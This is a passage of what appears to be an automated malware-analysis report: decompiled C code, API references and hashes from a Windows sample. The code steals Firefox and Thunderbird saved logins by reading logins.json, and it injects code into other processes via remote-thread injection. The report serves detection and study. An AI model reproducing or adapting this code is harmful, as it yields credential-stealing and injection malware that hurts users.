                                  0x0040a3bd
                                  0x0040a3d0
                                  0x0040a3dd
                                  0x0040a3e0
                                  0x0040a3f1
                                  0x0040a402
                                  0x0040a408
                                  0x0040a40c
                                  0x0040a40f
                                  0x0040a47d
                                  0x0040a411
                                  0x0040a411
                                  0x0040a411
                                  0x0040a413
                                  0x0040a417
                                  0x0040a41e
                                  0x0040a423
                                  0x0040a425
                                  0x0040a433
                                  0x0040a43f
                                  0x0040a44c
                                  0x0040a462
                                  0x0040a46a
                                  0x0040a473
                                  0x0040a86a
                                  0x0040a480
                                  0x0040a489
                                  0x0040a495
                                  0x0040a49d
                                  0x0040a4a6
                                  0x0040a4a9
                                  0x0040a4b5
                                  0x0040a4c4
                                  0x0040a4d0
                                  0x0040a4d8
                                  0x0040a4dc
                                  0x0040a4de
                                  0x0040a4f5
                                  0x0040a4fb
                                  0x0040a501
                                  0x0040a503
                                  0x00000000
                                  0x0040a505
                                  0x0040a509
                                  0x0040a50c
                                  0x0040a50f
                                  0x0040a511
                                  0x00000000
                                  0x0040a513
                                  0x0040a51a
                                  0x0040a527
                                  0x0040a52e
                                  0x0040a532
                                  0x0040a53f
                                  0x0040a546
                                  0x0040a553
                                  0x0040a55b
                                  0x0040a568
                                  0x0040a56b
                                  0x0040a570
                                  0x0040a573
                                  0x0040a57f
                                  0x0040a581
                                  0x0040a58a
                                  0x0040a58f
                                  0x0040a58f
                                  0x0040a598
                                  0x0040a5a1
                                  0x0040a5a7
                                  0x0040a5ac
                                  0x0040a5b8
                                  0x0040a5bd
                                  0x0040a5c3
                                  0x0040a5c5
                                  0x0040a5d5
                                  0x0040a5d9
                                  0x0040a5dc
                                  0x0040a5e9
                                  0x0040a5fa
                                  0x0040a5ff
                                  0x0040a60e
                                  0x0040a610
                                  0x0040a613
                                  0x0040a618
                                  0x0040a61b
                                  0x0040a620
                                  0x0040a622
                                  0x0040a7f5
                                  0x0040a7f5
                                  0x0040a628
                                  0x0040a628
                                  0x0040a62b
                                  0x0040a62b
                                  0x0040a62d
                                  0x0040a630
                                  0x0040a639
                                  0x0040a63c
                                  0x0040a63f
                                  0x0040a642
                                  0x0040a659
                                  0x0040a663
                                  0x0040a66b
                                  0x0040a67c
                                  0x0040a693
                                  0x0040a69d
                                  0x0040a6a8
                                  0x0040a6b9
                                  0x0040a6ce
                                  0x0040a6d3
                                  0x0040a6e0
                                  0x0040a6eb
                                  0x0040a6f9
                                  0x0040a707
                                  0x0040a71c
                                  0x0040a724
                                  0x0040a72c
                                  0x0040a749
                                  0x0040a751
                                  0x0040a75c
                                  0x0040a75f
                                  0x0040a781
                                  0x0040a789
                                  0x0040a794
                                  0x0040a797
                                  0x0040a79c
                                  0x0040a79f
                                  0x0040a7a8
                                  0x0040a7af
                                  0x0040a7b7
                                  0x0040a7bf
                                  0x0040a7c7
                                  0x0040a7cf
                                  0x0040a7d7
                                  0x0040a7dc
                                  0x0040a7df
                                  0x0040a7e4
                                  0x0040a7e4
                                  0x0040a7e4
                                  0x0040a7ed
                                  0x0040a7f0
                                  0x0040a7f0
                                  0x0040a7f8
                                  0x0040a7fe
                                  0x0040a800
                                  0x0040a809
                                  0x0040a80e
                                  0x0040a813
                                  0x0040a81d
                                  0x0040a827
                                  0x0040a82d
                                  0x0040a832
                                  0x0040a832
                                  0x0040a838
                                  0x0040a83f
                                  0x0040a846
                                  0x0040a849
                                  0x0040a851
                                  0x0040a854
                                  0x0040a85c
                                  0x0040a861
                                  0x0040a864
                                  0x0040a864
                                  0x0040a511
                                  0x0040a4e0
                                  0x0040a4e0
                                  0x0040a4e3
                                  0x0040a4eb
                                  0x0040a4eb
                                  0x0040a867
                                  0x0040a867
                                  0x0040a892
                                  0x0040a89c
                                  0x0040a89d
                                  0x0040a89d
                                  0x0040a8a5
                                  0x0040a8a5
                                  0x0040a8ad
                                  0x0040a8b5
                                  0x0040a8c0

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040B87D: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                    • Part of subcall function 0040B87D: lstrcatW.KERNEL32 ref: 0040B8C7
                                    • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                    • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                    • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  • lstrcatW.KERNEL32 ref: 0040A3F1
                                  • GetBinaryTypeW.KERNEL32 ref: 0040A402
                                  • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040A882
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                    • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040A579
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                  • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                  • API String ID: 288196626-815594582
                                  • Opcode ID: 6a137c3a8becdf846506f2e7c12f3be83cd2cbae3dacaf2288c82b898041fd66
                                  • Instruction ID: f77f0e27933f91ead54b6ecb8e2b1fb8a7b853b941c5058b019390cbb6b3834b
                                  • Opcode Fuzzy Hash: 6a137c3a8becdf846506f2e7c12f3be83cd2cbae3dacaf2288c82b898041fd66
                                  • Instruction Fuzzy Hash: 7EE1D571900219ABDB14EBA2DC92DEEBB79AF54308F10407FF506771D2DE386A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409E2D, Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E00409E2D(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				long _v56;
				int _v60;
				int _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				void* _v104;
				int _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				int _v152;
				long _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				long _t171;
				int _t182;
				int _t183;
				int _t186;
				int _t200;
				WCHAR* _t208;
				void* _t210;
				int _t214;
				void* _t223;
				void* _t229;
				void* _t235;
				int _t279;
				int _t281;
				char* _t321;
				void* _t382;
				intOrPtr _t385;
				intOrPtr _t387;
				WCHAR* _t392;
				int _t393;
				void* _t394;
				void* _t395;
				void* _t396;

				_t396 = __eflags;
				_t385 = __ecx;
				_v32 = __ecx;
				E004036F7( &_v24, L"Profile");
				_t279 = 0;
				E00401052( &_v1224, 0, 0x208);
				_v56 = 0;
				_v156 = 0;
				E00401052( &_v704, 0, 0x104);
				_t395 = _t394 + 0x14;
				_t381 =  &_v704;
				E0040B87D(L"thunderbird.exe",  &_v704, _t396);
				E004036F7( &_v44,  &_v704);
				GetBinaryTypeW( &_v704,  &_v156);
				E0040373F(_t395,  &_v44);
				_t289 = _t385;
				if(E0040ADE3(_t385,  &_v704,  &_v44) != 0) {
					L3:
					E0040357C( &_a4, _t381, __eflags, L"\\Thunderbird\\");
					E0040373F( &_v36,  &_a4);
					E0040357C( &_v36, _t381, __eflags, L"profiles.ini");
					E00403549( &_v24, E004036F7( &_v40, L"Profile"));
					E00405FEB(_v40);
					E00403384( &_v24, _t381, __eflags, _t279);
					_push(_v36);
					_push(0x104);
					while(1) {
						_t389 = _v24;
						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
						__eflags = _t171;
						if(_t171 == 0) {
							break;
						}
						_v56 = _v56 + 1;
						E00403549( &_v24, E004036F7( &_v60, L"Profile"));
						E00405FEB(_v60);
						_v60 = _t279;
						E00403384( &_v24, _t381, __eflags, _v56 + 1);
						E0040373F( &_v12,  &_a4);
						E0040357C( &_v12, _t381, __eflags,  &_v1224);
						E00403666( &_v12,  &_v28);
						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
						__eflags = _t182;
						if(_t182 == 0) {
							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
							_v152 = _t183;
							__eflags = _t183;
							if(_t183 == 0) {
								goto L5;
							} else {
								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
								_t395 = _t395 + 0xc;
								__eflags = _t186;
								if(_t186 != 0) {
									goto L5;
								} else {
									E0040373F( &_v20,  &_v12);
									E0040357C( &_v20, _t381, __eflags, L"\\logins.json");
									_t382 = 0x1a;
									E00410C8A( &_v16, _t382, __eflags);
									E0040357C( &_v16, _t382, __eflags, "\\");
									_t381 = 8;
									E00403447( &_v16, __eflags, E004035B9( &_v64, _t381, __eflags));
									E00405FEB(_v64);
									_v64 = _t279;
									E0040357C( &_v16, _t381, __eflags, L".tmp");
									_t392 = _v16;
									_t386 = _v20;
									__eflags = CopyFileW(_v20, _t392, _t279);
									if(__eflags != 0) {
										E00403549( &_v20,  &_v16);
										_t386 = _v20;
									}
									E004113ED( &_v184, __eflags);
									_t321 =  &_v180;
									E00403549(_t321,  &_v20);
									_push(_t321);
									_t200 = E004116B1( &_v184, 0xc0000000);
									_t323 =  &_v184;
									__eflags = _t200;
									if(__eflags != 0) {
										_v52 = _t279;
										_v48 = _t279;
										E0041135C( &_v184, _t381,  &_v52, _v164, _t279);
										_t208 = E004034D1( &_v104, "encryptedUsername");
										_t210 = E0040305D( &_v52,  &_v160);
										_t381 = _t208;
										_t281 = E0040961C(_t210, _t208, __eflags);
										_v108 = _t281;
										E00405FEB(_v160);
										_t332 = _v104;
										E00405FEB(_v104);
										__eflags = _t281;
										if(_t281 == 0) {
											_t279 = 0;
											__eflags = 0;
										} else {
											_t387 = _v32;
											_t279 = 0;
											__eflags = 0;
											_t393 = _v108;
											do {
												_v100 = 0;
												_v96 = 0;
												_v92 = 0;
												_t223 = E004034D1( &_v116, "hostname");
												E00409655( &_v40, E0040305D( &_v52,  &_v112), __eflags, _t223, _t393);
												E00405FEB(_v112);
												E00405FEB(_v116);
												_t229 = E004034D1( &_v124, "encryptedUsername");
												E00409655( &_v84, E0040305D( &_v52,  &_v120), __eflags, _t229, _t393);
												E00405FEB(_v120);
												E00405FEB(_v124);
												_t235 = E004034D1( &_v132, "encryptedPassword");
												_t381 = E0040305D( &_v52,  &_v128);
												E00409655( &_v80, _t237, __eflags, _t235, _t393);
												E00405FEB(_v128);
												E00405FEB(_v132);
												E0040A8C3(_t387, __eflags, _v84,  &_v136);
												E0040A8C3(_t387, __eflags, _v80,  &_v144);
												E00403549( &_v100, E004031AF( &_v40, __eflags,  &_v68));
												E00405FEB(_v68);
												_v68 = 0;
												E00403549( &_v96, E004031AF(E004034D1( &_v140, _v136), __eflags,  &_v72));
												E00405FEB(_v72);
												_v72 = 0;
												E00405FEB(_v140);
												E00403549( &_v92, E004031AF(E004034D1( &_v148, _v144), __eflags,  &_v76));
												E00405FEB(_v76);
												_v76 = 0;
												E00405FEB(_v148);
												_t395 = _t395 - 0x10;
												_v88 = 4;
												E00401FF2(_t395,  &_v100);
												E00402028(_t387);
												E00405FEB(_v80);
												E00405FEB(_v84);
												E00405FEB(_v40);
												_t332 =  &_v100;
												E00401441( &_v100);
												_t393 = _t393 - 1;
												__eflags = _t393;
											} while (_t393 != 0);
											_t392 = _v16;
											_t386 = _v20;
										}
										_t214 = PathFileExistsW(_t392);
										__eflags = _t214;
										if(_t214 != 0) {
											E0040373F(_t395,  &_v16);
											E0041142A(_t332);
										}
										 *((intOrPtr*)(_v32 + 0x84))(_v152);
										 *((intOrPtr*)(_v32 + 0x6c))();
										E00403148( &_v52);
										_t323 =  &_v184;
									}
									E0041140C(_t323, __eflags);
									E00405FEB(_t392);
									_v16 = _t279;
									E00405FEB(_t386);
									_v20 = _t279;
									E00405FEB(_v28);
									E00405FEB(_v12);
									_t385 = _v32;
								}
							}
						} else {
							L5:
							E00405FEB(_v28);
							E00405FEB(_v12);
						}
						_push(_v36);
						_v12 = _t279;
						_push(0x104);
					}
					E0040AD8C(_t385);
					_t279 = 1;
					__eflags = 1;
					E00405FEB(_v36);
				} else {
					E0040373F(_t395,  &_v44);
					if(E0040ADE3(_t385,  &_v704, _t289) != 0) {
						goto L3;
					} else {
						_t389 = _v24;
					}
				}
				E00405FEB(_v44);
				E00405FEB(_t389);
				E00405FEB(_a4);
				return _t279;
			}




































































                                  0x00409e2d
                                  0x00409e39
                                  0x00409e43
                                  0x00409e46
                                  0x00409e50
                                  0x00409e5a
                                  0x00409e64
                                  0x00409e6e
                                  0x00409e76
                                  0x00409e7b
                                  0x00409e7e
                                  0x00409e89
                                  0x00409e99
                                  0x00409eac
                                  0x00409eb9
                                  0x00409ebe
                                  0x00409ec7
                                  0x00409ee8
                                  0x00409ef0
                                  0x00409efc
                                  0x00409f09
                                  0x00409f1f
                                  0x00409f27
                                  0x00409f30
                                  0x00409f35
                                  0x00409f38
                                  0x0040a31e
                                  0x0040a31e
                                  0x0040a32f
                                  0x0040a335
                                  0x0040a337
                                  0x00000000
                                  0x00000000
                                  0x00409f4a
                                  0x00409f56
                                  0x00409f5e
                                  0x00409f67
                                  0x00409f6a
                                  0x00409f76
                                  0x00409f85
                                  0x00409f91
                                  0x00409f99
                                  0x00409f9d
                                  0x00409f9f
                                  0x00409fb6
                                  0x00409fbc
                                  0x00409fc2
                                  0x00409fc4
                                  0x00000000
                                  0x00409fc6
                                  0x00409fca
                                  0x00409fcd
                                  0x00409fd0
                                  0x00409fd2
                                  0x00000000
                                  0x00409fd4
                                  0x00409fdb
                                  0x00409fe8
                                  0x00409fef
                                  0x00409ff3
                                  0x0040a000
                                  0x0040a007
                                  0x0040a014
                                  0x0040a01c
                                  0x0040a029
                                  0x0040a02c
                                  0x0040a031
                                  0x0040a034
                                  0x0040a040
                                  0x0040a042
                                  0x0040a04b
                                  0x0040a050
                                  0x0040a050
                                  0x0040a059
                                  0x0040a062
                                  0x0040a068
                                  0x0040a06d
                                  0x0040a079
                                  0x0040a07e
                                  0x0040a084
                                  0x0040a086
                                  0x0040a096
                                  0x0040a09a
                                  0x0040a09d
                                  0x0040a0aa
                                  0x0040a0bb
                                  0x0040a0c0
                                  0x0040a0cf
                                  0x0040a0d1
                                  0x0040a0d4
                                  0x0040a0d9
                                  0x0040a0dc
                                  0x0040a0e1
                                  0x0040a0e3
                                  0x0040a2a4
                                  0x0040a2a4
                                  0x0040a0e9
                                  0x0040a0e9
                                  0x0040a0ec
                                  0x0040a0ec
                                  0x0040a0ee
                                  0x0040a0f1
                                  0x0040a0fa
                                  0x0040a0fd
                                  0x0040a100
                                  0x0040a103
                                  0x0040a11a
                                  0x0040a124
                                  0x0040a12c
                                  0x0040a13a
                                  0x0040a151
                                  0x0040a15b
                                  0x0040a163
                                  0x0040a171
                                  0x0040a183
                                  0x0040a188
                                  0x0040a192
                                  0x0040a19a
                                  0x0040a1ab
                                  0x0040a1bc
                                  0x0040a1d1
                                  0x0040a1d9
                                  0x0040a1e1
                                  0x0040a201
                                  0x0040a209
                                  0x0040a214
                                  0x0040a217
                                  0x0040a23c
                                  0x0040a244
                                  0x0040a24f
                                  0x0040a252
                                  0x0040a257
                                  0x0040a25a
                                  0x0040a267
                                  0x0040a26e
                                  0x0040a276
                                  0x0040a27e
                                  0x0040a286
                                  0x0040a28b
                                  0x0040a28e
                                  0x0040a293
                                  0x0040a293
                                  0x0040a293
                                  0x0040a29c
                                  0x0040a29f
                                  0x0040a29f
                                  0x0040a2a7
                                  0x0040a2ad
                                  0x0040a2af
                                  0x0040a2b8
                                  0x0040a2bd
                                  0x0040a2c2
                                  0x0040a2cc
                                  0x0040a2d6
                                  0x0040a2dc
                                  0x0040a2e1
                                  0x0040a2e1
                                  0x0040a2e7
                                  0x0040a2ee
                                  0x0040a2f5
                                  0x0040a2f8
                                  0x0040a300
                                  0x0040a303
                                  0x0040a30b
                                  0x0040a310
                                  0x0040a310
                                  0x00409fd2
                                  0x00409fa1
                                  0x00409fa1
                                  0x00409fa4
                                  0x00409fac
                                  0x00409fac
                                  0x0040a313
                                  0x0040a316
                                  0x0040a319
                                  0x0040a319
                                  0x0040a33f
                                  0x0040a349
                                  0x0040a349
                                  0x0040a34a
                                  0x00409ec9
                                  0x00409ed0
                                  0x00409ede
                                  0x00000000
                                  0x00409ee0
                                  0x00409ee0
                                  0x00409ee0
                                  0x00409ede
                                  0x0040a352
                                  0x0040a359
                                  0x0040a361
                                  0x0040a36c

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040B87D: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                    • Part of subcall function 0040B87D: lstrcatW.KERNEL32 ref: 0040B8C7
                                    • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                    • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                    • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  • GetBinaryTypeW.KERNEL32 ref: 00409EAC
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040ADE3: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                    • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                    • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF08
                                  • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040A32F
                                    • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF64
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                    • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                  • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                  • API String ID: 1065485167-1863067114
                                  • Opcode ID: 20fbf8cb5b50b562a7e5f6588e131815664c5ee6ddbea8753ef69d7b4fa44e2f
                                  • Instruction ID: fb365c449ce7900d484e2c61c5ec7aa39d660c5b142231a0d8c8c55fb7191f8b
                                  • Opcode Fuzzy Hash: 20fbf8cb5b50b562a7e5f6588e131815664c5ee6ddbea8753ef69d7b4fa44e2f
                                  • Instruction Fuzzy Hash: CDE1D671900219ABCB15EBA2DC92DEEBB79AF54308F10407EF506772D2DE386E45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407B2E, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 199injectionmemorywindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00407B2E(long _a12) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				long _v24;
				signed int _t33;
				void* _t37;
				void* _t40;
				long _t49;
				_Unknown_base(*)()* _t64;
				SIZE_T* _t69;
				void* _t76;
				void* _t80;
				void* _t87;
				void* _t91;

				if( *0x426754 == 0) {
					 *0x426754 = E0040FB98() != 0;
				}
				_t33 = OpenProcess(0x1fffff, 0, _a12);
				_t91 = _t33;
				if(_t91 != 0) {
					_v12 = GetCurrentProcess();
					if(E004121DC( &_v12) == 0) {
						L15:
						_t64 = VirtualAllocEx(_t91, 0, 0x100000, 0x3000, 0x40);
						if(_t64 == 0) {
							L23:
							_push(0xfffffffe);
							L24:
							_pop(_t37);
							return _t37;
						}
						_v24 = _v24 & 0x00000000;
						VirtualProtectEx(_t91, _t64, 0x100000, 0x40,  &_v24);
						_t40 = VirtualAllocEx(_t91, 0x33370000, 0x100, 0x3000, 0x40);
						_v20 = _t40;
						if(_t40 == 0) {
							goto L23;
						}
						_v8 = _v8 & 0x00000000;
						_t87 = "XXXXXX";
						if(WriteProcessMemory(_t91, _v20, _t87, E00401133(_t87),  &_v8) == 0 || _v8 != E00401133(_t87)) {
							L22:
							_push(0xfffffffd);
							goto L24;
						} else {
							_v12 = 0;
							if(WriteProcessMemory(_t91, _t64, 0x41e6c0, 0x1d44,  &_v12) == 0 || _v12 != 0x1d44) {
								goto L22;
							} else {
								return CreateRemoteThread(_t91, 0, 0, _t64, 0, 0, 0);
							}
						}
					}
					_t69 =  &_v12;
					_v12 = _t91;
					if(E004121DC(_t69) != 0) {
						goto L15;
					}
					_push(_t69);
					_push(_t69);
					_t49 = E0040FBB4(_t91, 0x100000, 0, 0);
					_v24 = _t49;
					if(_t49 != 0 || 0x100000 != 0) {
						_v12 = 0;
						E0040FD0D(_t91, 0x100000, _t49, 0x100000,  &_v12,  &_v12);
						_t76 = E0040FBB4(_t91, 0x100, 0x33370000, 0);
						_v20 = _t76;
						_v16 = 0x100;
						if(_t76 != 0 || 0x100 != 0) {
							_v8 = 0;
							if(E0040FAE9(_t91, "XXXXXX", _v20, _v16, E00401133("XXXXXX"),  &_v8) == 0 || _v8 != E00401133("XXXXXX")) {
								goto L22;
							} else {
								_t90 = _v24;
								_v8 = _v8 & 0x00000000;
								_t80 = _t91;
								if(E0040FAE9(_t80, 0x41c2a8, _v24, 0x100000, 0x2412,  &_v8) == 0 || _v8 != 0x2412) {
									goto L22;
								} else {
									MessageBoxA(0, "Injecting64", "Debug", 0);
									_push(_t80);
									_push(_t80);
									asm("cdq");
									return E0040FC62(0x41c2a8, _t91, 0x41c2a8, _t90, 0x100000);
								}
							}
						} else {
							goto L23;
						}
					} else {
						goto L23;
					}
				} else {
					return _t33 | 0xffffffff;
				}
			}


















                                  0x00407b3e
                                  0x00407b47
                                  0x00407b47
                                  0x00407b59
                                  0x00407b5f
                                  0x00407b63
                                  0x00407b76
                                  0x00407b80
                                  0x00407c99
                                  0x00407caf
                                  0x00407cb3
                                  0x00407d56
                                  0x00407d56
                                  0x00407d58
                                  0x00407d58
                                  0x00000000
                                  0x00407d58
                                  0x00407cb9
                                  0x00407cca
                                  0x00407ce2
                                  0x00407ce4
                                  0x00407ce9
                                  0x00000000
                                  0x00000000
                                  0x00407ceb
                                  0x00407cf3
                                  0x00407d0d
                                  0x00407d52
                                  0x00407d52
                                  0x00000000
                                  0x00407d1b
                                  0x00407d2d
                                  0x00407d38
                                  0x00000000
                                  0x00407d43
                                  0x00000000
                                  0x00407d4a
                                  0x00407d38
                                  0x00407d0d
                                  0x00407b86
                                  0x00407b89
                                  0x00407b93
                                  0x00000000
                                  0x00000000
                                  0x00407b99
                                  0x00407b9a
                                  0x00407ba4
                                  0x00407bac
                                  0x00407bb3
                                  0x00407bc0
                                  0x00407bc9
                                  0x00407be2
                                  0x00407be7
                                  0x00407bec
                                  0x00407bf1
                                  0x00407bfe
                                  0x00407c23
                                  0x00000000
                                  0x00407c39
                                  0x00407c39
                                  0x00407c3f
                                  0x00407c50
                                  0x00407c5c
                                  0x00000000
                                  0x00407c6f
                                  0x00407c7d
                                  0x00407c83
                                  0x00407c84
                                  0x00407c88
                                  0x00000000
                                  0x00407c91
                                  0x00407c5c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407b65
                                  0x00000000
                                  0x00407b65

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,00000000,00000000), ref: 00407B59
                                    • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                    • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                    • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                  • GetCurrentProcess.KERNEL32 ref: 00407B6D
                                    • Part of subcall function 004121DC: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                    • Part of subcall function 004121DC: GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                  • MessageBoxA.USER32 ref: 00407C7D
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040), ref: 00407CAD
                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407CCA
                                  • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407CE2
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407D05
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,0041E6C0,00001D44,?), ref: 00407D30
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407D4A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocCurrentMemoryWrite$AddressCreateHandleHeapMessageModuleOpenProcProtectRemoteThreadWow64
                                  • String ID: Debug$Injecting64$XXXXXX
                                  • API String ID: 1574360354-2389424830
                                  • Opcode ID: 0e01dc1136dec1d6105c25c51067433d34393140dd2267df3ffc9b6bd3bf666a
                                  • Instruction ID: d433ea0d1c2d4f6ec0602b92d9002377d3576233aac0b38f39bcf27655b0c8a4
                                  • Opcode Fuzzy Hash: 0e01dc1136dec1d6105c25c51067433d34393140dd2267df3ffc9b6bd3bf666a
                                  • Instruction Fuzzy Hash: 21519271E04205BBEB21A7618C45FBF7A7DEF85714F20417EF500B22D0E7B8AA45866E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413F7F, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81injectionmemorythreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00413F7F(long __edx) {
				void* _v8;
				long _v12;
				char _v268;
				void _v272;
				void* _t25;
				void* _t27;
				void* _t33;
				void* _t37;

				_t33 = OpenProcess(0x1fffff, 0, __edx);
				_v8 = _t33;
				_v272 = GetCurrentProcessId();
				_t35 = E00401085(0xff);
				GetModuleFileNameA(0, _t13, 0xff);
				E004011A4( &_v268, _t35);
				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
				WriteProcessMemory(_t33, _t27,  &E00426208, 0x800, 0);
				_t5 =  &_v8; // 0x413f7a
				VirtualProtectEx( *_t5, _t27, 0x800, 0x40,  &_v12);
				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
				_t9 = _t27 + 0x10e; // 0x10e
